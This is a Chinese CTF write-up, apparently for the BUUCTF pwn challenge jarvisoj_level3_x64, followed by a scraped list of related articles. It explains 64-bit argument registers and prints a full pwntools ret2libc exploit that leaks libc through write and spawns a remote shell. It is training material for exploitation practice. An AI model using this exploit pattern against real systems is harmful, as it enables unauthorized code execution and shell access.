这道题是一道简单的rop类型的题目,跟之前做的题目有一些差异:( 这是64位的需要一些额外的操作 )

64位汇编传参，当参数少于7个时， 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时， 前 6 个与前面一样， 但后面的依次从 “右向左” 放入栈中，即和32位汇编一样。

这里我们使用 write 函数 来泄密 libc地址

ssize_t write(int fd,const void*buf,size_t count); 参数说明：
fd:是文件描述符（write所对应的是写，即就是1） buf:通常是一个字符串，需要写入的字符串 count：是每次写入的字节数

write 函数的特殊之处是 它具有多个参数;

这里我们需要获得3个寄存器的地址来 存取参数;

rdi = 0x4006b3

rsi = 0x4006b1

这里 rsi 这个地址后面还跟着一个 寄存器 r15; 刚好够了3个寄存器 来供我们输入参数;

下面就是一些基本的ropexp;

from pwn import *
from LibcSearcher import *
r=remote('node3.buuoj.cn',29161)
elf=ELF("./1")
write_plt=elf.plt["write"]
write_got=elf.got["write"]
main=0x40061A
rdi=0x4006b3
rsi=0x4006b1
payload='a'*(0x80+0x8)+p64(rdi)+p64(1)+p64(rsi)+p64(write_got)+p64(8)+p64(write_plt)+p64(main)
r.sendlineafter("Input:\n",payload)
write_addr = u64(r.recv(8))
libc=LibcSearcher('write',write_addr)
offset=write_addr-libc.dump('write')
sys=offset+libc.dump('system')
binsh=offset+libc.dump('str_bin_sh')
payload='a'*(0x80+0x8)+p64(rdi)+p64(binsh)+p64(sys)
r.sendlineafter("Input:\n",payload)
r.interactive()

对exp有疑问的欢迎留言

BUUCTF(pwn)jarvisoj_level3_x64相关推荐

1. 持续更新 BUUCTF——PWN（一）

   文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...

2. BUUCTF Pwn warmup

   BUUCTF Pwn warmup 1.题目下载地址 2.checksec检查保护 3.IDA静态分析 4.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 啥都没开,果然是war ...

3. BUUCTF PWN rip1 WP

   BUUCTF   PWN   rip 1 这是一个WP,也是一个自己练习过程的记录. 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后 ...

4. buuctf pwn bjdctf_2020_babyrop

   buuctf pwn bjdctf_2020_babyrop 1.checksec 2.IDA分析 ropper 3.exp 1.checksec 运行一下 2.IDA分析 这里调用了vuln函数 我 ...

5. 持续更新 BUUCTF——PWN（二）

   文章目录 前言 0ctf_2017_babyheap ciscn_2019_s_9 hitcon2014_stkof roarctf_2019_easy_pwn picoctf_2018_shellc ...

6. 持续更新 BUUCTF——PWN（三）

   文章目录 前言 axb_2019_heap oneshot_tjctf_2016 护网杯_2018_gettingstart wustctf2020_number_game zctf2016_note ...

7. Buuctf(pwn) picoctf_2018_rop chain 栈溢出

   32位,开启了NX保护 利用思路 首先溢出后覆盖ret为function1函数地址,将win1赋值为1,之后跳转到function2的地址,a1是传入的参数,将a1传入即可满足条件去设置win2的值为 ...

8. BUUCTF(pwn) jarvisoj_level4 栈溢出,泄露libc

   思路 我们没有system和'/bin/sh'地址.也不知道libc版本, 我们可以先leek出来一个地址, 利用偏移找到system和'/bin/sh'地址.再返回main进行循环调用,第二次就可以 ...

9. Buuctf(pwn) jarvisoj_tell_me_something 栈溢出

   64位程序,开启了NX保护 400620 from pwn import *r=remote('node4.buuoj.cn',29273)flag_addr=0x400620payload='a'* ...

最新文章

1. 就业丨2018年国内就业薪资高的5大编程语言排行
2. 安卓开发学习日记 DAY5——监听事件onClick的实现方法
3. 【控制】《复杂运动体系统的分布式协同控制与优化》-方浩老师-第3章-局部指数稳定的多欧拉-拉格朗日系统协同控制
4. python3num='0123456789,num「:6:-1」=gt; '987'？「1:6:-1」为空
5. linux命令行怎么播放,如何在在 Linux 命令行中观看彩虹猫
6. 通俗易懂，嵌入式Linux驱动基础
7. 电脑home键在哪_电脑键盘各键的名称及使用方法
8. python 解方程 sympy_用Python和Sympy求解方程并得到数值答案
9. urban数据集_JUST技术：CK实现时序数据管理
10. WireShark下载：官网、源码
11. spss20安装许可证代码_SPSS23安装教程
12. 分享8个免费的超清背景图片下载网站
13. 爱情：溺水三千只取一瓢饮
14. ecshop二次开发手册【基本结构】
15. beego golang bootstrap-table做月度考勤（打卡、签到）统计表
16. debian7升级到debian9
17. 360无线wifi路由器连接到服务器,360无线路由器怎么有线桥接设置
18. PCB线路板进行热设计的方法都有哪些？
19. Processing 网格纹理制作（棋盘格）
20. python制作海报_生成海报（前端 | python）

热门文章

1. 数据扩张：数据的杠杆作用
2. mybatis高级(3)_延迟加载_深度延迟_一级缓存_二级缓存
3. 跟着开涛学SpringMVC 第一章源代码下载
4. 设计模式（中介者模式）
5. 微软职位内部推荐-Senior Development Lead – Sharepoint
6. 【原创】如何组织好一个学习小组
7. 黄聪：C#代码生成工具:文本模板初体验 Hello,World!
8. ASUS WL-500W企业级无线路由器试用
9. 服务器重启后，启动SAP ERP的步骤
10. SAP系统中在发布了webservice，获得了WSDN地址后，外部系统怎么传数据到SAP?